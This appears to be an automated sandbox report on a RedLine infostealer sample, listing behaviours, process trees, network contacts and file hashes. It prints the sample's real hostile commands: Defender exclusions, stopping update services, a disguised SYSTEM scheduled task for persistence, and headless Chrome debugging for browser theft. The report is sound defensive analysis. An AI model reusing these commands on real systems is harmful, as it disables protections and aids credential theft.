Malware Analysis Report

2025-01-18 09:10

Sample ID 230810-w448eaab6x
Target 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp
SHA256 64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

64ae95f87a315b58eed9b81f334ec34d7683d59e62dbf71269858206bfa45a5c

Threat Level: Known bad

The file 2636-63-0x0000000004180000-0x00000000041B4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida persistence

RedLine

Redline family

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:29

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:29

Reported

2023-08-10 18:32

Platform

win7-20230712-en

Max time kernel

101s

Max time network

149s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2344 created 1212 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 612 set thread context of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2184 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3032 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2184 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 1568 wrote to memory of 1540 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 2484 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 900 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1568 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1660 wrote to memory of 1756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1536 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 1740 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 1660 wrote to memory of 2724 N/A C:\Windows\System32\powercfg.exe C:\Windows\System32\powercfg.exe
PID 612 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2452 wrote to memory of 2276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 612 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 1444 wrote to memory of 1708 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2184 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2804 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2636-63-0x0000000004180000-0x00000000041B4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 108

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {147C1EEA-47E8-4895-B8ED-04B4C7CA12A5} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=20001 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataTSVP9" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5c19758,0x7fef5c19768,0x7fef5c19778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=808 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1232 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=20001 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1596 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1888 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2404 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2552 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1992 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=20001 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2744 --field-trial-handle=1012,i,17112921287755877849,17699872464701156620,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabA97B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarABFD.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 42a68be0730ba92c69d428ff97552d83
SHA1 fb79c5d1b57ca4adf3e609219e9d7c846c1bc8b8
SHA256 1a0681d36f2bbe09f0477e85931a4cc7d8a2904c3746dcf75067a0c7ffd47ab7
SHA512 4d6ccd21d88529ad930df7afbb147b25194917f5467437e50853c980a655afbd93d91c9e4690501ea08ae2adc61b3034312b3a75b1cd1ca3484f06dcfb25d252

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/612-168-0x0000000000840000-0x0000000000ACB000-memory.dmp

memory/612-169-0x0000000000840000-0x0000000000ACB000-memory.dmp

memory/2452-176-0x000000001B120000-0x000000001B402000-memory.dmp

memory/2452-178-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/2452-177-0x0000000002250000-0x0000000002258000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JXLDCY0XZTWZDJM8TO5J.temp

MD5 a72c5745e7416be8826ee38c64a56900
SHA1 60b950d228d567febf6f8c13dabda943b28cdb51
SHA256 59069a653fdf344b7c9d78dc818f36b301285437cf3ae2216829b3241692c65a
SHA512 dde0b403c4271101032841797cb9e11499d697eccab49d89b3c4bfa11192b4d6c2b3bf3c7bc611887126d3610b585592cfd7d5cb24d9625863579cecd6579fe8

memory/2452-179-0x00000000024B0000-0x0000000002530000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a72c5745e7416be8826ee38c64a56900
SHA1 60b950d228d567febf6f8c13dabda943b28cdb51
SHA256 59069a653fdf344b7c9d78dc818f36b301285437cf3ae2216829b3241692c65a
SHA512 dde0b403c4271101032841797cb9e11499d697eccab49d89b3c4bfa11192b4d6c2b3bf3c7bc611887126d3610b585592cfd7d5cb24d9625863579cecd6579fe8

memory/2452-180-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/2452-181-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2452-182-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/2452-184-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1576-183-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-185-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-191-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1576-193-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1576-194-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1576-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2452-203-0x000007FEF4560000-0x000007FEF4EFD000-memory.dmp

memory/1576-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1576-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2344-211-0x0000000076E90000-0x0000000077039000-memory.dmp

memory/2344-209-0x000000013FDE0000-0x0000000141006000-memory.dmp

memory/1576-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1576-228-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-232-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1576-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

